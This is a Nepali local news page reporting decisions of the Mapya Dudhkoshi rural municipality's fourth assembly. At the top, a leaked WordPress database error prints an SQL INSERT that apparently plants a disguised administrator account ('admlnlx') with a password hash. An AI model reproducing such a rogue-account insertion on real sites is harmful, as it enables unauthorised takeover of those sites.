WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BqvZJWchN6i11H7jVB/hf9lfu98gFu.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 08:24:27', '', 'admlnlx', 'admlnlx')

माप्य दुधकोशी गाउँपालिकाको चौथो गाउँ सभा सम्पन्न – Gaule Khabar

माप्य दुधकोशी गाउँपालिकाको चौथो गाउँ सभा सम्पन्न

माप्य दुधकोशी गाउँपालिकाको चौथो गाउँ सभा सम्पन्न

गाउँले न्यूज, सोलुखुम्बु । माप्य दुधकोशी गाउँपालिकाको चौथो गाउँ सभा सम्पन्न भएको छ । फाल्गुन २९ गते विहिबार गाउँपालिका अध्यक्ष बुद्धिकिरण राईको अध्यक्षतामा बसेको सभाले स्थानीय सरकार संचालनका लागि विभिन्न १३ वटा विद्येयक पारित गरेको छ । अहिले सम्म गाउँपालिकामा जम्मा २१ वटा बिधेयक पास भाईसकेको छ ।

गाउसभाले गाउँपालिका वैठक संचालन सम्बन्धि ऐन, गाउँसभा संचालन सम्बन्धि ऐन, ‘घ’ वर्गको निर्माण व्यवसायी ईजाजत पत्र सम्बन्धि कार्यविधि, आकस्मिक कोष तथा व्यवस्थापन कार्यविधि, स्थानीय ऊर्जा विकास सम्बन्धि निर्देशिका, पुर्वाधार विकास सम्बन्धि ऐन पारित गरेको हो । गाउँ सभाले गाउँपालिका स्वास्थ्य तथा सरसफाई ऐन, आर्थिक ऐन, कृषि तथा पशु व्यवसाय प्रर्वद्धन ऐन, एफ.एम. रेडियो संचालन कार्यविधि, स्थानीय कर कार्यविधि, प्राकृतिक स्रोतसाधन परिचालन तथा व्यवस्थापन र कार्यान्वयन कार्यविधि र करारमा प्राविधिक कर्मचारी व्यवस्थापन कार्यविधि पनि पारित गरेको छ ।

गाउँसभाले सम्पुर्ण वडा र पालिका भित्रका ५ माध्यमिक विद्यालयमा ईन्टरनेट जडान गर्ने, कायाघाट स्थित दुधकोशी नदिमा ट्रष्ट ब्रिज निर्माणका लागि डिपिआर निर्माण गरि टेण्डर प्रक्रिया अघि बढाउने निर्णय गरेको छ । त्यस्तै, सेतिआहालको सडकका लागि बजेट विनियोजन गर्ने, उद्यमशीलता सम्बन्धि तालिम वडा नं ५ मा संचालन गर्ने, वडा नं २ मा पार्क सहितको खालिङ समुदायको प्रतिक चिण्डो निर्माण गर्ने, गाउँ सभाका सदस्यहरुको पोषाकमा एकरुपता ल्याउने निर्णय पनि गाउँ सभाले गरेको छ ।

सभाले पहिलो र दोस्रो चौमासिकका योजना, कार्यक्रम र प्रशासनिक खर्च तथा प्रोत्साहन सम्बन्धि शिक्षा समितिको निर्णयलाई अनुमोदन गरेको छ । तामाखानी विद्युत निर्माणको प्रक्रिया अघि बढाउदा गाउँपालिकाको पुर्ण सहमतिमा आवश्यक पर्ने गरि निर्णय गरिएको छ । त्यस्तै, वडा नं ५ मा पर्ने सेति आहाल, सुन्दर झरना, सिलगुढीडाँडा र महभीरलाई पर्यटकीय गन्तव्यको विकास गर्ने गाउँ सभाले निर्णय गरेको छ ।

गाउँपालिकाको समिक्षालय हल क्षेत्रमा खानेपानी, सौचाल लगायतका व्यवस्थापनका लागि आवश्यक बजेट विनियोजन गर्ने र रंगशाला निर्माणको लागि जग्गा पास गर्ने निर्णय गरेको छ । वडा नं ४ कोर्कुबाट प्राप्त करिब तिन सय रोपनी जग्गा पास गर्ने निर्णय गरेको छ । रंगशाला निर्माणको लागि गाउँपालिकाले क्रमागत योजनाका रुपमा सन्चालन गर्ने आर्थिक वर्ष २०७४/७५ मा ७ लाख, २०७५/७६ मा २५ लाख बजेट विनियोजन गरेको छ भने प्रदेश र केन्द्र सरकारबाट पनि बजेटको विनियोजको लागि पहल गर्न पहल गर्ने गाउँपालिकाले जनाएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका